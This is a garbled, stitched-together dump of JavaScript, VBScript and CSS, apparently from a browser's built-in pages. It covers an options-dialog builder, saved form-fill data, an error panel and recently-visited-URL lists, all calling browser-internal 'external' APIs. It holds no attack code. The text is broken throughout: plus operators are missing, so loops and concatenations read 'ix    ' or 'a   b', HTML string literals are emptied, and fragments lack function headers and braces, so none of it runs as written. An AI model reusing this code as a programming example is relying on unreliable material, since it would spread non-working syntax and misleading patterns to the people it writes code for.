oTr = pObj.parentElement.parentElement.parentElement;

oTb = oTr.parentElement.parentElement;

formID = oTr.getAttribute( "tw_formID" );

window.external.twDeleteFormData( window, "", formID );

TalComForm.deleteRow(oTr.rowIndex);

window.location.reload();

oTr = pObj.parentElement.parentElement;

TalUserForm.deleteRow(oTr.rowIndex);

if( moreInfo.style.display == "none" ){

moreInfo.style.display = "";

moreImg.src="more2.gif";

moreInfo.style.display = "none";

moreImg.src="more1.gif";

colInput = formdatatable.getElementsByTagName("input");

nCount = colInput.length;

if( colInput[i].type != "button" )

colInput[i].value = "";

oTr = _oLastSel.parentElement;

if(formID.indexOf("twcommon_")!=-1){

window.external.twFormSave( window, "", formID );

formName = tw_formName.value;

formName = userformName.innerText;

oTr.cells[1].innerText = formName;

oTr = pObj.parentElement;

comDiv.style.display = "";

userDiv.style.display = "none";

tw_formName.value = formName;

window.external.twFormLoad( window, "", formID );

comDiv.style.display = "none";

userDiv.style.display = "";

var oTr = oTb.insertRow( -1 );

var oTd = oTr.insertCell( 0 );

var oTd1 = oTr.insertCell( 1 );

oTr.height = "32px";

oTd.width = "24";

oTd.style.cursor="pointer";

oTd.onclick=OnDeleteItem;

oTd.innerHTML = "
";

oTd1.style.cursor="pointer";

oTd1.onmouseleave=OnLeaveItem;

oTd1.onmouseenter=OnEnterItem;

oTd1.onclick=OnSelectCommonItem;

oTd1.style.color=_tabtextcolor;

oTd1.noWrap = true;

oTd1.innerText=formName;

oTr.setAttribute( "tw_formID", formID );

window.external.twAddComFormData( window, "" );

var nCount = _vCommonData.length;

SelectCommonItem( TalComForm.rows[nCount-1].cells[1] );

if( _oLastSel.parentElement != null )

_oLastSel.parentElement.bgColor = _tabItemDefColor;

_oLastSel.style.fontWeight = "normal";

_oLastSel.style.color = _tabtextcolor;

pObj.parentElement.bgColor = _tabItemSelColor;

pObj.style.fontWeight = "bold";

pObj.style.color = _tabSeltextcolor;

nCount = oTab.rows.length;

oTab.deleteRow(0);

formName = tw_getFormDataInfo( _vCommonData[i].id, "tw_formName" );

OnAddForm(TalComForm, formName, _vCommonData[i].id );

var nCount = _vUserData.length;

var oTr = TalUserForm.insertRow( -1 );

oTd.onclick=OnDeleteUserFormItem;

oTd.innerHTML = "";

oTd1.innerHTML="";

formName = tw_getFormDataInfo( _vUserData[i].id, "tw_formName" );

oTd1.childNodes[0].innerText = formName;

formUrl = tw_getFormDataInfo( _vUserData[i].id, "tw_form_url" );

oTd1.childNodes[0].href = formUrl;

oTr.setAttribute( "tw_formID", _vUserData[i].id );

oTr.bgColor = "#F5F5F5";

_vCommonData.splice( 0, _vCommonData.length );

_vUserData.splice( 0, _vUserData.length );

formObj.id = tw_getFormDataByIndex( nIndex );

if(formObj.id.indexOf("twcommon_")!=-1)

_vCommonData[_vCommonData.length] = formObj;

_vUserData[_vUserData.length] = formObj;

addForm.style.color = _tabtextcolor;

if( _vCommonData.length == 0 ){

if( _vCommonData.length > 0 )

pObj = TalComForm.rows[0].cells[1];

document.write( ""   _strWebSite   " | "  _strAboutPhoenix  " | "  _strThanks  "
" );

var _strLoginInfo="

var _strPassQues="

var _strPass="

var _strPassAnswer="

var _strWeb="

var _strWebSite = "

var _strWebSiteLink = "http://www.fjmjm.com";

var _strPhoenixLink = "http://www.fjmjm.com";

var _strThanksLink = "http://www.fjmjm.com";

Dim g_urlArray( 1024 ):Dim g_nCountVB:g_nCountVB = 0:Function SetArray( nIndex, strItem ):if nIdex < 1024 then:

g_urlArray( nIndex ) = strItem:

end if:End Function:Function OpenAllByVB( ):call window.external.twmutinavigate( window, "", g_urlArray(0), g_nCountVB ):End Function

g_strSecurityId = external.twGetSecurityID( window )

ret = external.twoption( g_strSecurityId, nID, bWrite, g_lValue, g_bstrValue1, g_bstrValue2, g_strArray(0), g_arraySize )

var oNewNode = document.createElement("LI");

header_btn.appendChild(oNewNode);

inFrame.document.write( "" );

inFrame.document.write( "" );

inFrame.document.write( "
" );

inFrame.document.write( "

" );
inFrame.document.body.leftMargin = 0;
inFrame.document.body.topMargin = 0;
inFrame.document.body.rightMargin = 0;
inFrame.document.body.bottomMargin = 0;
inFrame.document.body.marginwidth = 0;
inFrame.document.body.marginheight = 0;
function InsertInfoItemByHTML( nLine, nChar, nErrCode, strErrMsg, strErrUrl )
oHint.style.display="none";
infoTable = inFrame.window.oTa;
var oTr = infoTable.insertRow( -1 );
oColl = infoTable.rows;
if( oColl.length%2 )
oTr.bgColor = "#FFFFFF";
oTr.bgColor = "#F4FBFF";
strLine = strTemp.replace( "$ERR_TEMP", nLine );
strChar = strTemp.replace( "$ERR_TEMP", nChar );
strMSG = strTemp.replace( "$ERR_TEMP", strErrMsg );
strCode = strTemp.replace( "$ERR_TEMP", nErrCode );
strHTML = _strHTMLString.replace( "$ERR_LINE", strLine );
strHTML = strHTML.replace( "$ERR_CHAR", strChar );
strHTML = strHTML.replace( "$ERR_MSG", strMSG );
strHTML = strHTML.replace( "$ERR_CODE", strCode );
strHTML = strHTML.replace( "$ERR_URL", strErrUrl );
oTd.innerHTML = strHTML;
oTr.scrollIntoView(true);

document.write( "

"   _strExit   "

document.write( "

 "   _strBtnOK   "\

  "   _strBtnCancel   "" );

optionsTab.tabid = tabid;

optionsTab.tabname = tabname;

optionsTab.tabbgcolor = "#FFFFFF";

optionsTab.tabhotbgcolor = "#CDE3F5";

optionsTab.tabtextcolor = "#000000";

optionsTab.tabhottextcolor = "#FF5A00";

optionsTab.vSubTitleArray = new Array();

_vOptionTabsArray[_vOptionTabsArray.length] = optionsTab;

return optionsTab.vSubTitleArray;

tabSubTitle.titlename = titlename;

tabSubTitle.titleHelpLink = "";

tabSubTitle.vIA = new Array();

if ( arguments.length >= 3 )

tabSubTitle.titleHelpLink = titleHelpLink;

vSubTitleArray[vSubTitleArray.length] = tabSubTitle;

return tabSubTitle.vIA;

contextItem.itemID = itemID;

contextItem.itemIndex = -1;

contextItem.itemType = itemType;

contextItem.itemText = itemText;

contextItem.bItemChange = false;

contextItem.vAA = new Array();

contextItem.itemCode = "";

contextItem.itemAfterCode = "";

contextItem.itemPreCode = "";

contextItem.itemHelpLink = "";

if ( arguments.length >= 5 )

contextItem.itemPreCode = itemPreCode;

if ( arguments.length >= 6 )

contextItem.itemAfterCode = itemAfterCode;

if ( arguments.length >= 7 )

contextItem.itemCode = itemCode;

vIA[vIA.length] = contextItem;

contextItem.itemIndex = _vOIA.length;

_vOIA[_vOIA.length] = contextItem;

if ( "ckbedit" == itemType && "" != contextItem.itemCode )

contextItem.itemCode = contextItem.itemCode.replace( /#IDDEFINE/g, "id=item_edit_"   contextItem.itemIndex );

return contextItem.itemIndex;

radioBtn.btnText = btnText;

radioBtn.btnPreCode = "";

radioBtn.btnAfterCode = "";

radioBtn.vAA = new Array();

radioBtn.btnPreCode = btnPreCode;

if ( arguments.length >= 4 )

radioBtn.btnAfterCode = btnAfterCode;

var nIndex = vRadioArray.length;

tableList.tableRgnSize = tableRgnSize;

tableList.tableHeight = tableHeight;

tableList.vTopBtn = new Array();

tableList.vBottomBtn = new Array();

tableList.vHeader = new Array();

tableList.bHaveCheckBox = bChecked;

var vHeader = tableList.vHeader;

oHeader.headerText = headerText;

oHeader.headerWidth = headerWidth;

oHeader.bHidden = bHidden;

oHeader.headerText = "";

vHeader[ vHeader.length ] = oHeader;

var vBtn = tableList.vTopBtn;

vBtn = tableList.vBottomBtn;

oBtn.btnOpt = btnOpt;

oBtn.btnText = btnText;

vBtn[ vBtn.length ] = oBtn;

for ( var ix = 0; ix < _vOptionTabsArray.length; ix    )

document.write( "" );

document.write( "
" );

document.write( ""   _vOptionTabsArray[ix].tabname   "" );

for ( ix = 0; ix < _vOptionTabsArray.length; ix    )

if ( _SelectTabIndex == _vOptionTabsArray[ix].tabid )

if ( ix >= _vOptionTabsArray.length )

_SelectTabIndex = _vOptionTabsArray[0].tabid;

eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabbgcolor;

eval( "tabs_table_"   _SelectTabIndex ).style.display = "none";

eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabhotbgcolor;

eval( "tabs_table_"   _SelectTabIndex ).style.display = "";

divform_context.scrollTop = 0;

_vOIA[ nIndex ].bItemChange = true;

for ( var ix = 0; ix < vAA.length; ix    )

var itemType = _vOIA[ vAA[ix] ].itemType;

eval( "item_ckb_"   vAA[ix] ).disabled = bDisabled;

eval( "item_edit_"   vAA[ix] ).disabled = bDisabled;

oCheckBox.disabled = bDisabled;

eval( "item_edit_"   vAA[ix] ).disabled = ( oCheckBox.disabled || !oCheckBox.checked );

eval( "item_edit1_"   vAA[ix] ).disabled = bDisabled;

eval( "item_edit2_"   vAA[ix] ).disabled = bDisabled;

eval( "item_btn_"   vAA[ix] ).disabled = bDisabled;

var vRadioArray = _vOIA[ vAA[ix] ].itemCode;

for ( var radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )

eval( "item_radio_"   vAA[ix]   "["   radioIndex   "]" ).disabled = bDisabled;

eval( "item_list_"   vAA[ix] ).disabled = bDisabled;

eval( "item_textarea_"   vAA[ix] ).disabled = bDisabled;

if ( "ckb" == _vOIA[ nIndex ].itemType )

if ( !eval( "item_ckb_"   nIndex ).disabled )

bCheck = eval( "item_ckb_"   nIndex ).checked;

RealDoAssociate( _vOIA[ nIndex ].vAA, !bCheck, bRecursive );

else if ( "ckbedit" == _vOIA[ nIndex ].itemType )

eval( "item_edit_"   nIndex ).disabled = !bCheck;

else if ( "radio" == _vOIA[ nIndex ].itemType )

var vRadioArray = _vOIA[ nIndex ].itemCode;

var vAA = vRadioArray[ radioIndex ].vAA;

if ( !eval( "item_radioid_"   nIndex   radioIndex ).disabled )

bCheck = eval( "item_radioid_"   nIndex   radioIndex ).checked;

document.write( " "  _vOptionTabsArray[ix].tabname   " " );for ( var x = 0; x < _vOptionTabsArray[ix].vSubTitleArray.length; x    )
if ( "" != _vOptionTabsArray[ix].vSubTitleArray[x].titleHelpLink )
titleHelp = " ";
document.write( "
" );vIA = _vOptionTabsArray[ix].vSubTitleArray[x].vIA;
for ( var y = 0; y < vIA.length; y    )
var itemEnd = vIA[y].itemAfterCode   "";
if ( "" != vIA[y].itemHelpLink )
itemEnd = " "   vIA[y].itemAfterCode   "";
if ( "ckb" == vIA[y].itemType )
nRet = DoOption( vIA[y].itemID, false );
document.write( itemBegin   "
" );document.write( "
"   _vOptionTabsArray[ix].vSubTitleArray[x].titlename   ""   titleHelp   "
"   vIA[y].itemPreCode   ""   vIA[y].itemText   ""   itemEnd );eval( "item_ckb_"   vIA[y].itemIndex ).checked = Boolean( g_lValue );
eval( "item_ckb_"   vIA[y].itemIndex ).disabled = true;
else if ( "text" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   vIA[y].itemText   itemEnd );else if ( "edit" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   itemEnd );eval( "item_edit_"   vIA[y].itemIndex ).value = g_bstrValue1;
eval( "item_edit_"   vIA[y].itemIndex ).disabled = true;
else if ( "ckbedit" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   vIA[y].itemText   "" );if ( vIA[y].itemCode == "" )
document.write( "" );
document.write( vIA[y].itemCode );
document.write( itemEnd );
else if ( "quickaddr" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   vIA[y].itemText   " "   vIA[y].itemCode   " 
"   itemEnd );eval( "item_edit1_"   vIA[y].itemIndex ).value = g_bstrValue1;
eval( "item_edit2_"   vIA[y].itemIndex ).value = g_bstrValue2;
eval( "item_edit1_"   vIA[y].itemIndex ).disabled = true;
eval( "item_edit2_"   vIA[y].itemIndex ).disabled = true;
else if ( "fileselect" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   vIA[y].itemText   " "   itemEnd );eval( "item_btn_"   vIA[y].itemIndex ).disabled = true;
else if ( "radio" == vIA[y].itemType )
var vRadioArray = vIA[y].itemCode;
document.write( itemBegin   " "   vIA[y].itemPreCode );document.write( vRadioArray[ radioIndex ].btnPreCode   ""   vRadioArray[radioIndex].btnText   ""   vRadioArray[ radioIndex ].btnAfterCode );
eval( "item_radio_"   vIA[y].itemIndex   "["   g_lValue   "]" ).checked = true;
for ( radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )
eval( "item_radio_"   vIA[y].itemIndex   "["   radioIndex   "]" ).disabled = true;
else if ( "list" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   vIA[y].itemText   ""   itemEnd );eval( "item_list_"   vIA[y].itemIndex ).selectedIndex = g_lValue;
eval( "item_list_"   vIA[y].itemIndex ).disabled = true;
else if ( "btn" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   itemEnd );else if ( "textarea" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   ""   itemEnd );eval( "item_textarea_"   vIA[y].itemIndex ).value = g_bstrValue1;
eval( "item_textarea_"   vIA[y].itemIndex ).disabled = true;
else if ( "gesture" == vIA[y].itemType )
document.write( itemBegin   " "   vIA[y].itemPreCode   "" );document.write( ""   vIA[y].itemCode   "
" );
document.write( "" );document.write( "
" );
gesture_listsel.style.posWidth = 250;
var arrayID = g_strArray.toArray();
var arrayImg = g_strArray.toArray();
var arrayText = g_strArray.toArray();
document.write( "
" );document.write( "
" );eval( "gesture_seltext_"   arrayIndex ).innerHTML = " "   gesture_listsel.options[wHigh].value;
document.write( "
" );document.write( "  "   arrayText[arrayIndex]   " 
"   itemEnd );
else if ( "tablelist" == vIA[y].itemType )
var tableList = vIA[y].itemCode;
document.write( itemBegin   " "   vIA[y].itemPreCode   "" );document.write( "
" );document.write( "" );
document.write( "" );for ( var headerIndex = vHeader.length - 1; headerIndex >= 0; headerIndex -- )
if ( !vHeader[ headerIndex ].bHidden )
vHeader[ nLastNoHiddenHeader ].headerWidth  = 17;
for ( headerIndex = 0; headerIndex < vHeader.length; headerIndex    )
document.write( "
" );vHeader[ nLastNoHiddenHeader ].headerWidth -= 17;
document.write( "
"   vHeader[ headerIndex ].headerText   "
" );
document.write( "" );if( vIA[y].itemID == 2200 )
InsertSearchTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
InsertTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
document.write( "
" );var vTopBtn = tableList.vTopBtn;
for ( var btnIndex = 0; btnIndex < vTopBtn.length; btnIndex    )
document.write( "
" );
document.write( "" );
eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
document.write( "
" );var vBottomBtn = tableList.vBottomBtn;
for ( btnIndex = 0; btnIndex < vBottomBtn.length; btnIndex    )
document.write( "" );
eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
document.write( "
"   itemEnd );document.write( "
" );

for ( var ix = 0; ix < _vOIA.length; ix    )

var x1 = strItem.search( /:\^:/ );

strCol = strItem.substr( 0 );

strCol = strItem.substring( 0, x1 );

strItem = strItem.substr( x1   3 );

var searchUrl = varArray[2];

var searchKey = varArray[3];

var strTemp = strChecked   ":^:"   searchName   ":^:"   searchKey   ":^:"   searchUrl   ":^:"   searchHome;

var tableList = _vOIA[ nIndex ].itemCode;

var oTr = oTable.insertRow( nPos );

oTr.style.cursor = "default";

oTr.id = "tablelist_"   nIndex   "_item"   nPos;

oTr.onclick = OnTableListTrClick;

for ( var ix = 0; ix < vHeader.length; ix    )

var oTd = oTr.insertCell();

if( ix == 0 && tableList.bHaveCheckBox )

if ( vHeader[ix].bHidden )

oTd.innerHTML = "";;

oTd.innerHTML = strCol;

oTd.width = vHeader[ix].headerWidth;

oTd.style.wordWrap = "break-word";

nID = this.id;

var x1 = nID.search( /_.*_/ )   1;

var x2 = nID.search( /_item*/ );

var nIndex = nID.substring( x1, x2 );

var nItemIndex = nID.substr( x2   5 );

var nSelect = eval( "tablelist_select_"   nIndex ).value;

eval( "tablelist_"   nIndex   "_item"   nSelect ).bgColor = "#FFFFFF";

eval( nID ).bgColor = "#DFF4F8";

eval( "tablelist_select_"   nIndex ).value = nItemIndex;

var x1 = nID.search( /_*_/ )   1;

var x2 = nID.search( /_index*/ );

var btnOpt = nID.substring( x1, x2 );

var nIndex = nID.substr( x2   6 );

if ( -1 != oSelect.value )

oTable.deleteRow( oSelect.value );

for ( var ix = 0; ix < oTable.rows.length; ix    )

oTable.rows( ix ).id = "tablelist_"   nIndex   "_item"   ix;

if ( 0 == oTable.rows.length )

oSelect.value = -1;

else if ( oSelect.value >= oTable.rows.length )

oSelect.value --;

eval( "tablelist_"   nIndex   "_item"   oSelect.value ).bgColor = "#DFF4F8";

if ( -1 != ( Number( oSelect.value ) - 1 ) )

oTable.moveRow( oSelect.value, Number( oSelect.value ) - 1 );

oSelect.value = Number( oSelect.value ) - 1;

if ( Number( oSelect.value )   1 < ( oTable.rows.length ) )

oTable.moveRow( oSelect.value, Number( oSelect.value )   1 );

oSelect.value = Number( oSelect.value )   1;

DoAction( _vOIA[ nIndex ].itemID, 0 );

if( 2200 == _vOIA[ nIndex ].itemID )//

InsertSearchTableListRow( nIndex, oTable.rows.length, g_strActionParam );

InsertTableListRow( nIndex, oTable.rows.length, g_strActionParam );

var oTr = oTable.rows[ oSelect.value ];

g_strActionParam = oTr.cells[1].innerText   ":^:";

var col = oTr.cells[0].getElementsByTagName("input");

if(col[0].value == "on" )

g_strActionParam  = oTr.cells[3].innerText;

g_strActionParam  = oTr.cells[2].innerText;

for ( var ix = 4; ix < oTr.cells.length; ix    )

g_strActionParam  = oTr.cells[ix].innerText;

if ( Number( ix   1 ) != oTr.cells.length )

for ( var ix = 0; ix < oTr.cells.length; ix    )

if ( "" == oTr.cells[ix].innerText )

var col = oTr.cells[ix].getElementsByTagName( "input" );

g_strActionParam  = col[0].value;

DoAction( _vOIA[ nIndex ].itemID, 1 );

InsertSearchTableListRow( nIndex, oSelect.value, g_strActionParam );

InsertTableListRow( nIndex, oSelect.value, g_strActionParam );

for ( ix = 0; ix < _vOIA.length; ix    )

if ( "btn" == _vOIA[ix].itemType )

if ( _vOIA[ix].bItemChange )

if ( "ckb" == _vOIA[ix].itemType )

g_lValue = eval( "item_ckb_"   ix ).checked;

else if ( "edit" == _vOIA[ix].itemType )

g_bstrValue1 = eval( "item_edit_"   ix ).value;

else if ( "ckbedit" == _vOIA[ix].itemType )

else if ( "quickaddr" == _vOIA[ix].itemType )

g_bstrValue1 = eval( "item_edit1_"   ix ).value;

g_bstrValue2 = eval( "item_edit2_"   ix ).value;

else if ( "fileselect" == _vOIA[ix].itemType )

else if ( "radio" == _vOIA[ix].itemType )

var vRadioArray = _vOIA[ix].itemCode;

if ( eval( "item_radio_"   ix   "["   radioIndex   "]" ).checked )

else if ( "textarea" == _vOIA[ix].itemType )

g_bstrValue1 = eval( "item_textarea_"   ix ).value;

else if ( "list" == _vOIA[ix].itemType )

g_lValue = eval( "item_list_"   ix ).selectedIndex;

g_bstrValue1 = eval( "item_list_"   ix ).value;

else if ( "tablelist" == _vOIA[ix].itemType )

g_arraySize = oTable.rows.length;

var oTr = oTable.rows[x];

if( 2200 == _vOIA[ ix ].itemID )//

strItem = oTr.cells[1].innerText   ":^:";

if(col[0].checked == true )

strItem  = oTr.cells[3].innerText   ":^:";

strItem  = oTr.cells[2].innerText   ":^:";

for ( var y = 4; y < oTr.cells.length; y    )

strItem  = oTr.cells[y].innerText;

if ( Number( y   1 ) != oTr.cells.length )

for ( var y = 0; y < oTr.cells.length; y    )

if ( "" == oTr.cells[y].innerText )

var col = oTr.cells[y].getElementsByTagName( "input" );

strItem  = col[0].value;

var oTr = oTable.rows[0];

col[0].checked = true;

else if ( "gesture" == _vOIA[ix].itemType )

g_arraySize = gesture_table.rows.length;

var strItem = ( eval( "gesture_id_"   arrayIndex ).value & 0xffff ) | ( ( eval( "gesture_sel_"   arrayIndex ).value & 0xffff ) << 16 )

DoOption( _vOIA[ix].itemID, true );

_vOIA[ix].bItemChange = false;

external.twclosetab( window, "" );

Call external.twaction( window, nID, nCode, g_strActionParam )

var _strHelpLink = "http://www.fjmjm.com";

var _strHelpLinkRoot = "http://www.fjmjm.com/hl/cn/";

", "h1.1.htm" );

", "h1.2.htm" );

:8-256)" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 2402, "ckb", "

_vOIA[nIndex].vAA[0] = AddCI( vIA, 2102, "quickaddr", "Ctrl Enter       ", "", "
", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 2103, "quickaddr", "Shift Enter      ", "", "
", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 2104, "quickaddr", "Ctrl Shift Enter ", "", "
", "

_vOIA[nIndex].vAA[3] = AddCI( vIA, 2105, "quickaddr", "Ctrl Alt Enter", "", "
", "

AddCI( vIA, -1, "text", "

", "h2.htm#1" );

", "h3.1.htm" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 3302, "ckb", "

Windows2000

HTTPS

_vOIA[_vOIA[nIndex].vAA[0]].vAA[0] = AddCI( vIA, 3303, "radio", "", "", "
", vRadioArray );

_vOIA[nIndex].vAA[1] = AddCI( vIA, 3304, "ckb", "

nIndex=_vOIA[nIndex].vAA[1];

_vOIA[nIndex].vAA[0] = AddCI( vIA, 3305, "ckb", "

", "h3.2.htm" );

vRadioArray[2].vAA[0] = AddCI( vIA, 3203, "list", "

.torrent;.ram)

_vOIA[nIndex].vAA[0] = AddCI( vIA, 4003, "ckb", "

", "h4.htm#1" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 4102, "ckb", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 4103, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 4104, "ckb", "

", "h4.htm#2" );

", "h4.1.htm" );

_vOIA[nIndex].vAA[0]=AddCI( vIA, 4403, "edit", "45", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 4402, "textarea", "", "", "
", "cols=\"70\" rows=\"12\"" );

www.fjmjm.com

_vOIA[nIndex].itemHelpLink = "h5.htm#1";

_vOIA[nIndex].vAA[0] = AddCI( vIA, 5007, "radio", "", "", "
", vRadioArray );

_vOIA[nIndex].itemHelpLink = "h5.htm#2";

_vOIA[nIndex].vAA[0] = AddCI( vIA, 5003, "ckb", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 5004, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 5005, "ckb", "

_vOIA[nIndex].vAA[3] = AddCI( vIA, 5008, "ckb", "

", "h5.1.htm" );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 5203, "fileselect", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 5204, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 5205, "ckb", "

_vOIA[nIndex].vAA[3] = AddCI( vIA, 5206, "radio", "", "", "
", vRadioArray );

_vOIA[nIndex].vAA[0] = AddCI( vIA, 7002, "ckb", "Internet

_vOIA[nIndex].vAA[1] = AddCI( vIA, 7003, "ckb", "

_vOIA[nIndex].vAA[2] = AddCI( vIA, 7004, "ckb", "Cookies

_vOIA[nIndex].vAA[3] = AddCI( vIA, 7005, "ckb", "

_vOIA[nIndex].vAA[4] = AddCI( vIA, 7006, "ckb", "

_vOIA[nIndex].vAA[5] = AddCI( vIA, 7007, "ckb", "

_vOIA[nIndex].vAA[0] = AddCI( vIA, 7100, "ckb", "

_vOIA[nIndex].vAA[1] = AddCI( vIA, 7102, "btn", "

", "h8.htm#1" );

", "h8.htm#2" );

_vOIA[nIndex].itemHelpLink = "h8.htm#3";

", "" );

127.0.0.1:80@HTTP#

Vista/Windows7

Windows

XMLHttpRequest

_vOIA[nIndex].vAA[0] = AddCI( vIA, 9109, "ckb", "

a.overflowHide {overflow:hidden;text-overflow:ellipsis;white-space:nowrap; width: 95%;}

.white:hover {font-size:12px;text-decoration:none;color: #FF5A00}

.wrap {width:700px;padding-left:40;font-size:12px;}

.headwrap {width:100%;height:48;overflow:hidden;background-image:url(sztop2.gif);line-height: 40px;background-repeat:repeat-x;}

.header_l {text-indent:30px;width:309px;font-size:15px;color:#FFFFFF;font-weight:bold;float:left;background-image:url(sztop.gif);background-repeat:no-repeat;}

.header_r {height:48;float:right;}

.header_r ul {padding-right:20px;*padding-top:10px;}

.header_r ul li {float:left;}

.title_frame {width:100%;overflow:hidden;font-size:12px;font-weight:bold;color:#3399cc;margin-top:16px;}

.title_l {float:left;}

.title_r {float:right;font-weight:normal;}

.title_r A:link {font-size:12px;text-decoration:none;color: #3399cc}

.title_r A:visited {font-size:12px;text-decoration:none;color: #3399cc}

.title_r ul li {float:left;padding-left:20px;}

.separator {width:100%;height:1px;border-top:1px solid #b7d8ed;padding:0;margin:5 0 0 0;}

#qp_item ul li div a.overflowHide{margin-left:8px;height:16px;overflow:hidden;text-overflow:ellipsis;width:85%;}

#qp_item .addAddress {margin: 0 0 0 40;}

#url_item {width:100%;}

#url_item ul {float:left;width:100%;}

#url_item ul li {float:left;width:100%;height:32px;}

#url_item ul li a {;height:16px; margin-left: 8px;}

#url_item ul li img {height:16px;}

4-.NW

//twinfo.htm

:$ERR_MSG

:$ERR_CODE
URL:$ERR_URL";

//twpage.htm tp*

var _tpLastUrl = "

var _tpAddURL = '

var _message_noneURL = '

//navierr.htm

function twRS (str) {document.write(str);}

var tip_show, g_s_id = external.twGetSecurityID(window), isTpShow, _userPages;

var tTp = external.twGetDailyTips(g_s_id);

if(tTp && tTp.length)

isTpShow = true, tipText.innerHTML = tTp;

isTpShow = false, _id('topImg_3').style.filter = 'alpha(opacity=50)', endLine.style.display = 'inline', dailytips.style.display = 'none';

_id('topImg_3').style.filter = 'alpha(opacity='   (tip_show == '0' ? 50 : 99)   ')';

endLine.style.display = tip_show == '0' ? 'inline' : 'none', dailytips.style.display = tip_show == '0' ? 'none' : 'inline';

btn.innerHTML = "";

tip_show = external.getOptionValue(g_s_id, "twhome", "showtip"), Tipshow();

var url_loaded = 0, url_show = '', lastUrlName = [], lastUrl = [], ctLt = 0,

oldUrlName = [], oldUrl = [], ctOld = 0, twurldivTemp = document.createElement( "div" );

function tw_getUrlData(i, t){

return external.twgetlasturl(window, '', i, t ? 1 : 0);

external.twdeletelasturl(window, '', str_url = (t ? lastUrl : oldUrl)[num = Number(i)], t ? 0 : 1), (t ? lastUrl : oldUrl)[num] = "";

for(var i = 0; str_data = tw_getUrlData(i, 0); i   , ctLt   )

arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), lastUrl[i] = arr_temp[0], lastUrlName[i] = arr_temp[1];

for(var i = 0; str_data = tw_getUrlData(i, 1); i   , ctOld   )

arr_temp = str_data.split(str_data.indexOf("**") != -1 ? "**" : "::"), oldUrl[i] = arr_temp[0], oldUrlName[i] = arr_temp[1];

function URL_Openall(){

var lists = document.getElementById("url_item").getElementsByTagName("a");

for(var i=0;iSetArray(g_nCountVB  ,lists[i].href);
_userPages || (external.twclosetab(window,''));
function OnBodyKeydown () {
13 == event.keyCode && URL_Openall();
function Url_LoadItem() {
if(document.getElementById("lasturl").currentStyle.display=="none")
url_loaded = 1, strHTML = document.createElement('ul');
if (lastUrl.length oldUrl.length == 0)
return (url_show = '0', lasturl.style.display = 'none', _id('topImg_2').style.filter = 'alpha(opacity=50)');
if(i>lastUrl.length-1)candidate.push("" filter(lastUrlName[i]) "
");
while(availSize>=0 && j<=oldUrl.length-1){
candidate2.push("" filter(oldUrlName[j]) "
");
strHTML.innerHTML = candidate2.join("") candidate.join("");
url_item.appendChild(strHTML);
for(var i = 0, tA = _tag('a', strHTML); i < tA.length;i  ){
tA[i].className = tA[i].offsetWidth > 618 ? 'overflowHide' : '';
function Urlshow(){
_id('topImg_2').style.filter = 'alpha(opacity='   (url_show == '0' ? 50 : 99)   ')';
lasturl.style.display = url_show == "0" ? "none" : "inline";
url_loaded || Url_LoadItem();
function Url_showSwitch() {
tw_setOptVal("twhome", "showurl", url_show = url_show == "0" ? "1" : "0"), Urlshow();
function InitUrlList() {
btn.innerHTML = "";
url_show = external.getOptionValue(g_s_id, "twhome", "showurl"), url_show = url_show || '1', Urlshow();
function clearFullUrl () {
for(var i = 0, tU = lastUrl,tOU = oldUrl; i < tU.length   tOU.length; i   )
external.twdeletelasturl(window, '', i < tU.length ? tU[i] : tOU[i - tU.length], i < tU.length ? 0 : 1);
lastUrlName = [], lastUrl = [], oldUrlName = [], oldUrl = [];
url_item.innerHTML = '', url_show = '0', Urlshow();
function getDomainByUrl( strUrl ) {return strUrl.replace(/^(http:\/\/[^\/] )\/.*/g, "$1");}
var tryPath = external.twGetAppPath(g_s_id), strUrl = "user2.gif", tId = encodeURIComponent(strDomain)   parseInt(Math.random() * 1000, 10);
if (strDomain && strDomain.length)
strDomain  = (strDomain.length - 1 != strDomain.lastIndexOf("/") ? '/' : ''), strUrl = strDomain.length > 1 ? strDomain   "favicon.ico" : strUrl;
tImg.onload = function () {_id(tId).src = this.src;}
tImg.src = tryPath   '/ImgCache/'   strUrl.replace(/\w*:\/\//, '').replace(/\//g, '_');
return "";
while(line = external.getOptionValue(g_s_id, "twhome", "qp" i)){
dataList.push(line);
return (dataList.length==0)? null:dataList;
this.clearData();
if(!dataList.length)
